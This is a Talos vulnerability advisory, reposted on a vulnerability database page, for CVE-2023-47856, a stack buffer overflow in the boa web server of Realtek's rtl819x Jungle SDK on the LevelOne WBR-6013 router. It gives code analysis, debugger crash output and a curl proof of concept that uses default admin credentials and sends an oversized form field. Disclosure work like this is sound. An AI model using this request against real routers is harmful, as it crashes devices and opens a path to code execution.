Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
talosTalos IntelligenceTALOS-2023-1892
HistoryJul 08, 2024 - 12:00 a.m.

Realtek rtl819x Jungle SDK boa set_RadvdPrefixParam stack-based buffer overflow vulnerability

2024-07-0800:00:00
Talos Intelligence
www.talosintelligence.com
6
realtek
jungle sdk
boa
radvdprefixparam
buffer overflow
levelone
wbr-6013
cve-2023-47856
wireless router
security
stack-based
vulnerability
remote code execution

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

AI Score

8.2

Confidence

High

EPSS

0.001

Percentile

17.4%

JSON

Talos Vulnerability Report

TALOS-2023-1892

Realtek rtl819x Jungle SDK boa set_RadvdPrefixParam stack-based buffer overflow vulnerability

July 8, 2024
CVE Number

CVE-2023-47856

SUMMARY

A stack-based buffer overflow vulnerability exists in the boa set_RadvdPrefixParam functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
Realtek rtl819x Jungle SDK v3.4.11

PRODUCT URLS

rtl819x Jungle SDK - <https://www.realtek.com/en/&gt; WBR-6013 - <https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103&gt;

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-121 - Stack-based Buffer Overflow

DETAILS

The WBR-0613 is a wireless router designed for home or office use. It boasts wireless speeds of up to 300Mbps. In order to enhance security it provides network isolation by allowing up to 4 SSIDs and client isolation.

This Realtek rtl819x Jungle SDK vulnerability was found while researching the Levelone WBR-6013 router. We are going to explain this vulnerability from the perspective of the WBR-6013 router.

The WBR-6013 router has a web server called boa. The version used in the device is that of a Realtek SDK that uses boa. One of the SDK’s API is /boafrm/formRadvd. This API allows modifications of some parameters related to router advertisement. The function responsible for this API is boa’s formRadvd:

void formRadvd(request *wp, char *path, char *query)
{
    [...]
    radvdCfgParam_t radvdCfgParam;
[1] getRadvdInfo(&radvdCfgParam);

    save_translation = get_correct_lang("Save");
    save_and_apply_translation = get_correct_lang("Save & Apply");
    get_correct_lang("Save & Apply");
[2] if((0 == strcmp(req_get_cstream_var(wp,"submit",""), save_translation))||(0 == strcmp(req_get_cstream_var(wp, ("save_apply"), ""), save_and_apply_translation)))
    {
        set_RadvdParam(wp, path, query,&radvdCfgParam);
    }
    [...]	
}

The router advertisement information is fetched, at [1], in radvdCfgParam. This function checks if, in the request’s parameters, there is at least one key between submit and save_apply that satisfies the checks at [2]. If so the set_RadvdParam function is called with the radvdCfgParam argument. If changes are required, the changes are performed in this struct variable and later committed in the flash. Following the set_RadvdParam function:

int set_RadvdParam(request *wp, char *path, char *query, radvdCfgParam_t *pradvdCfgParam)
{
    [...]
    enable=atoi(req_get_cstream_var(wp,"enable_radvd",""));
    [...]
    if(enable)
    {
        set_RadvdInterfaceParam(wp, path, query,pradvdCfgParam);
        set_RadvdPrefixParam(wp, path, query,pradvdCfgParam);
    }
    return 0;
}

This function will fetch the enable_radvd request’s parameter, if the value defined the functions set_RadvdInterfaceParam and set_RadvdPrefixParam are called. Following the set_RadvdPrefixParam function:

int set_RadvdPrefixParam(request *wp,  char *path, char *query, radvdCfgParam_t *pradvdCfgParam)
{
    [...]

    for(j=0;j&lt;MAX_PREFIX_NUM;j++)
    {
        [...]
        sprintf(tmpname,"if6to4_%d",j);
[3]     tmpstr =req_get_cstream_var(wp,tmpname,"");
        if(strcmp(pradvdCfgParam-&gt;interface.prefix[j].if6to4, tmpstr))
        {
[4]         strcpy(pradvdCfgParam-&gt;interface.prefix[j].if6to4, tmpstr);
        }
    }

    return 0;
}

Here the pradvdCfgParam variable, considering the code path shown above, will reside in the stack frame of the formRadvd function. At [3] the if6to4_&lt;j&gt; request’s parameter is fetched and used at [4] to update, if necessary, the interface.prefix[j].if6to4 struct member of the pradvdCfgParam variable.

Because no checks are performed on the size of the if6to4_&lt;j&gt; request’s parameter string, a buffer overflow can occur at [4] in the stack variable radvdCfgParam in the formRadvd function. An attacker could exploit this vulnerability to achieve arbitrary code execution.

Crash Information

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$zero: 0x00000000  β†’  0x00000000
$at  : 0xfffffff8  β†’  0xfffffff8
$v0  : 0x0000003d  β†’  0x0000003d
$v1  : 0x00000446  β†’  0x00000446
$a0  : 0x004c5cc4  β†’  0x5454502d  β†’  0x5454502d ("TTP-"?)
$a1  : 0x407ffae1  β†’  0x00000000  β†’  0x00000000
$a2  : 0x00000000  β†’  0x00000000
$a3  : 0x00000000  β†’  0x00000000
$t0  : 0x0000003e  β†’  0x0000003e
$t1  : 0xbf80055c  β†’  0xbf80055c
$t2  : 0x00000002  β†’  0x00000002
$t3  : 0x00000200  β†’  0x00000200
$t4  : 0x00000100  β†’  0x00000100
$t5  : 0x00000807  β†’  0x00000807
$t6  : 0x00000800  β†’  0x00000800
$t7  : 0x004b0000  β†’  0x004b0000
$s0  : 0x41414141  β†’  0x41414141 ("AAAA"?)
$s1  : 0x41414141  β†’  0x41414141 ("AAAA"?)
$s2  : 0x41414141  β†’  0x41414141 ("AAAA"?)
$s3  : 0x41414141  β†’  0x41414141 ("AAAA"?)
$s4  : 0x41414141  β†’  0x41414141 ("AAAA"?)
$s5  : 0x41414141  β†’  0x41414141 ("AAAA"?)
$s6  : 0x00000004  β†’  0x00000004
$s7  : 0x00449638  β†’  0x666f726d  β†’  0x666f726d ("form"?)
$t8  : 0x004b56c0  β†’  0x3ff44400  β†’  0x28c80008  β†’  0x28c80008
$t9  : 0x3ff44400  β†’  0x28c80008  β†’  0x28c80008
$k0  : 0x00000000  β†’  0x00000000
$k1  : 0x00000000  β†’  0x00000000
$s8  : 0x0000005c  β†’  0x0000005c
$pc  : 0x41414141  β†’  0x41414141 ("AAAA"?)
$sp  : 0x408004e0  β†’  0x41414141  β†’  0x41414141 ("AAAA"?)
$hi  : 0x00000004  β†’  0x00000004
$lo  : 0x0006a280  β†’  0x0006a280
$fir : 0x00739300  β†’  0x00739300
$ra  : 0x41414141  β†’  0x41414141 ("AAAA"?)
$gp  : 0x3ff875c0  β†’  0x6c5f636f  β†’  0x6c5f636f ("l_co"?)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x408004e0β”‚+0x0000: 0x41414141  β†’  0x41414141	 ← $sp
0x408004e4β”‚+0x0004: 0x41414141  β†’  0x41414141
0x408004e8β”‚+0x0008: 0x41414141  β†’  0x41414141
0x408004ecβ”‚+0x000c: 0x41414141  β†’  0x41414141
0x408004f0β”‚+0x0010: 0x41414141  β†’  0x41414141
0x408004f4β”‚+0x0014: 0x41414141  β†’  0x41414141
0x408004f8β”‚+0x0018: 0x41414141  β†’  0x41414141
0x408004fcβ”‚+0x001c: 0x004c28d0  β†’  0x00000005  β†’  0x00000005
──────────────────────────────────────────────────────────────────────────────────────────────────────── code:mips:MIPS32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414140
───────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0x41414141 in ?? (), reason: SIGSEGV

Exploit Proof of Concept

To use a specific API of the web server, because of a CSRF protection mechanism, it is necessary to load the HTML page that would call that API:

curl --user admin:admin http://&lt;DEVICE_IP&gt;/radvd.htm &&gt;/dev/null

After this request it is possible to use the /boafrm/formRadvd API:

curl -d "submit=Save&enable_radvd=1&submit-url=POC&if6to4_0=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://&lt;DEVICE_IP&gt;/boafrm/formRadvd

After the request the boa process will crash. The POC uses the default admin credentials.

VENDOR RESPONSE

Realtek has provided updates software to their customers. LevelOne has declined to patch the issues in their software.

TIMELINE

2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-05-20 - Vendor Patch Release
2024-07-08 - Public Release

Credit

Discovered by Francesco Benvenuto of Cisco Talos.

Vulnerability Reports Next Report

TALOS-2023-1894

Previous Report

TALOS-2023-1893

Related

vulnrichment 1
nvd 1
cve 1
cvelist 1
talosblog 1
vulnrichment
vulnrichment
CVE-2023-47856
2024-07-08 15:22:26
nvd
nvd
CVE-2023-47856
2024-07-08 16:15:04
cve
cve
CVE-2023-47856
2024-07-08 16:15:04
cvelist
cvelist
CVE-2023-47856
2024-07-08 15:22:26
talosblog
talosblog
15 vulnerabilities discovered in software development kit for wireless routers
2024-07-10 16:00:53

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

AI Score

8.2

Confidence

High

EPSS

0.001

Percentile

17.4%

JSON
Related for TALOS-2023-1892
vulnrichment1nvd1cve1cvelist1talosblog1